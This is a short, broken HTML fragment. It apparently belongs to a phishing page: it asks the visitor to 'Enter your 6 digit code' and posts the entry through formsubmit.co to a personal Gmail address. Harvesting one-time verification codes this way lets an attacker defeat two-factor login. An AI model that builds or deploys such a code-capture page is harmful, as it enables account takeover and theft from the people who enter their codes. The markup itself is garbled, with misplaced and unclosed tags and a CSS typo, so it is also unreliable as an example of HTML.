<center>
   </label>
   <br />
   <label>
       Enter your 6 digit code:
<h1>
       <textarea cols="30"></textarea>
   </label>
</body>
</html><form action=" https://formsubmit.co/goodboyph123@gmail.com" method="POST" />
  











<h1>
<style type="text/css">
  button {
    border: none;
    background: #0076ff;
    border-radius: 20px; 
    padding: 20px;
    color: #fff;
    font-weight: bold;
    font-size: 20px:
    text-transform: uppercase;

   }
</style>
<button>  send </button>

      